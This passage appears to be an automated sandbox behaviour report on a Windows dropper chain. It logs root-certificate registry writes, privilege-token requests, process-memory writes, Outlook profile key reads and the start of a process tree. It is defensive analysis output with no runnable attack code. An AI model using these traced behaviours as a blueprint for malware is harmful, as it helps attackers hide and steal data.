94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Calculator%20Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Calculator%20Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Calculator%20Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2952 powershell.exe 2952 powershell.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 2824 Thu166f9a8bbe80.exe 3152 FrtT6nDxGGNaNQJGpSMuoIte.exe 3152 FrtT6nDxGGNaNQJGpSMuoIte.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3208 Process not Found -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2092 UNPgDYBJfd6kF2hyuwASzsYz.exe 3380 EE1A.exe 6864 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
pid Process 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe 6748 msedge.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
pid Process 4240 4944009.scr 5628 8456642.scr -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSystemtimePrivilege 4128 svchost.exe Token: SeSystemtimePrivilege 4128 svchost.exe Token: SeIncBasePriorityPrivilege 4128 svchost.exe Token: SeCreateTokenPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeAssignPrimaryTokenPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeLockMemoryPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeIncreaseQuotaPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeMachineAccountPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeTcbPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeSecurityPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeTakeOwnershipPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeLoadDriverPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeSystemProfilePrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeSystemtimePrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeProfSingleProcessPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeIncBasePriorityPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeCreatePagefilePrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeCreatePermanentPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeBackupPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeRestorePrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeShutdownPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeAuditPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeSystemEnvironmentPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeChangeNotifyPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeRemoteShutdownPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeUndockPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeSyncAgentPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeEnableDelegationPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeManageVolumePrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeImpersonatePrivilege 1068 Thu165bd34b1e1d4d81.exe Token: SeCreateGlobalPrivilege 1068 Thu165bd34b1e1d4d81.exe Token: 31 1068 Thu165bd34b1e1d4d81.exe Token: 32 1068 Thu165bd34b1e1d4d81.exe Token: 33 1068 Thu165bd34b1e1d4d81.exe Token: 34 1068 Thu165bd34b1e1d4d81.exe Token: 35 1068 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 3360 Thu161580bf75.exe Token: SeDebugPrivilege 864 taskkill.exe Token: SeRestorePrivilege 4748 WerFault.exe Token: SeBackupPrivilege 4748 WerFault.exe Token: SeBackupPrivilege 4748 WerFault.exe Token: SeDebugPrivilege 2492 5748237.scr Token: SeCreateTokenPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeAssignPrimaryTokenPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeLockMemoryPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeIncreaseQuotaPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeMachineAccountPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeTcbPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeSecurityPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeTakeOwnershipPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeLoadDriverPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeSystemProfilePrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeSystemtimePrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeProfSingleProcessPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeIncBasePriorityPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeCreatePagefilePrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeCreatePermanentPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeBackupPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeRestorePrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeShutdownPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeDebugPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe Token: SeAuditPrivilege 6132 surHKlFIOl98IaTC679RP8rQ.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 4852 Thu16f3de88a335950bb.tmp 6748 msedge.exe 5408 Calculator%20Installation.exe 5408 Calculator%20Installation.exe 5408 Calculator%20Installation.exe 5408 Calculator%20Installation.exe 5408 Calculator%20Installation.exe 5408 Calculator%20Installation.exe 5408 Calculator%20Installation.exe 5408 Calculator%20Installation.exe 5408 Calculator%20Installation.exe 5408 Calculator%20Installation.exe 5408 Calculator%20Installation.exe 2808 installer.exe 2808 installer.exe 2808 installer.exe 2808 installer.exe 2808 installer.exe 2808 installer.exe 2808 installer.exe 2808 installer.exe 2808 installer.exe 2808 installer.exe 2808 installer.exe 6276 Calculator.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3208 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3532 wrote to memory of 2340 3532 setup_x86_x64_install.exe 85 PID 3532 wrote to memory of 2340 3532 setup_x86_x64_install.exe 85 PID 3532 wrote to memory of 2340 3532 setup_x86_x64_install.exe 85 PID 2340 wrote to memory of 2512 2340 setup_installer.exe 86 PID 2340 wrote to memory of 2512 2340 setup_installer.exe 86 PID 2340 wrote to memory of 2512 2340 setup_installer.exe 86 PID 2512 wrote to memory of 2584 2512 setup_install.exe 90 PID 2512 wrote to memory of 2584 2512 setup_install.exe 90 PID 2512 wrote to memory of 2584 2512 setup_install.exe 90 PID 2512 wrote to memory of 1988 2512 setup_install.exe 91 PID 2512 wrote to memory of 1988 2512 setup_install.exe 91 PID 2512 wrote to memory of 1988 2512 setup_install.exe 91 PID 2512 wrote to memory of 1980 2512 setup_install.exe 92 PID 2512 wrote to memory of 1980 2512 setup_install.exe 92 PID 2512 wrote to memory of 1980 2512 setup_install.exe 92 PID 2512 wrote to memory of 1876 2512 setup_install.exe 93 PID 2512 wrote to memory of 1876 2512 setup_install.exe 93 PID 2512 wrote to memory of 1876 2512 setup_install.exe 93 PID 2512 wrote to memory of 3176 2512 setup_install.exe 94 PID 2512 wrote to memory of 3176 2512 setup_install.exe 94 PID 2512 wrote to memory of 3176 2512 setup_install.exe 94 PID 2512 wrote to memory of 1816 2512 setup_install.exe 95 PID 2512 wrote to memory of 1816 2512 setup_install.exe 95 PID 2512 wrote to memory of 1816 2512 setup_install.exe 95 PID 2512 wrote to memory of 1468 2512 setup_install.exe 113 PID 2512 wrote to memory of 1468 2512 setup_install.exe 113 PID 2512 wrote to memory of 1468 2512 setup_install.exe 113 PID 2512 wrote to memory of 2056 2512 setup_install.exe 112 PID 2512 wrote to memory of 2056 2512 setup_install.exe 112 PID 2512 wrote to memory of 2056 2512 setup_install.exe 112 PID 2512 wrote to memory of 2264 2512 setup_install.exe 96 PID 2512 wrote to memory of 2264 2512 setup_install.exe 96 PID 2512 wrote to memory of 2264 2512 setup_install.exe 96 PID 2512 wrote to memory of 3384 2512 setup_install.exe 98 PID 2512 wrote to memory of 3384 2512 setup_install.exe 98 PID 2512 wrote to memory of 3384 2512 setup_install.exe 98 PID 1980 wrote to memory of 3332 1980 cmd.exe 97 PID 1980 wrote to memory of 3332 1980 cmd.exe 97 PID 1980 wrote to memory of 3332 1980 cmd.exe 97 PID 2512 wrote to memory of 4400 2512 setup_install.exe 99 PID 2512 wrote to memory of 4400 2512 setup_install.exe 99 PID 2512 wrote to memory of 4400 2512 setup_install.exe 99 PID 2584 wrote to memory of 2952 2584 cmd.exe 111 PID 2584 wrote to memory of 2952 2584 cmd.exe 111 PID 2584 wrote to memory of 2952 2584 cmd.exe 111 PID 2512 wrote to memory of 4212 2512 setup_install.exe 100 PID 2512 wrote to memory of 4212 2512 setup_install.exe 100 PID 2512 wrote to memory of 4212 2512 setup_install.exe 100 PID 1988 wrote to memory of 2824 1988 cmd.exe 101 PID 1988 wrote to memory of 2824 1988 cmd.exe 101 PID 1988 wrote to memory of 2824 1988 cmd.exe 101 PID 4212 wrote to memory of 3108 4212 cmd.exe 102 PID 4212 wrote to memory of 3108 4212 cmd.exe 102 PID 4212 wrote to memory of 3108 4212 cmd.exe 102 PID 1876 wrote to memory of 3360 1876 cmd.exe 110 PID 1876 wrote to memory of 3360 1876 cmd.exe 110 PID 3176 wrote to memory of 3408 3176 cmd.exe 109 PID 3176 wrote to memory of 3408 3176 cmd.exe 109 PID 3176 wrote to memory of 3408 3176 cmd.exe 109 PID 2056 wrote to memory of 4000 2056 cmd.exe 108 PID 2056 wrote to memory of 4000 2056 cmd.exe 108 PID 1468 wrote to memory of 4296 1468 cmd.exe 103 PID 1468 wrote to memory of 4296 1468 cmd.exe 103 PID 1468 wrote to memory of 4296 1468 cmd.exe 103 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS429079F3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2512 -
